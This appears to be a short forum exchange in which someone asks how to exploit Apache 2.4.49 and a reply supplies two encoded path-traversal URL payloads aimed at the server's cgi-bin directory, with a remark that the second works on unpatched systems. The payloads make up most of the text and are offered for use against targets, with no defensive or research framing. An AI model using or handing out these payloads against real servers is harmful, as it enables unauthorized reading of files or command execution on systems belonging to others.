How to exploite apache 2.4.49 ? new Vuln?

How to exploite apache 2.4.49 ??? new Vuln??

$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2 but i think they have relesed patch for this one

also try this one if system is not up to date then it will work $host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2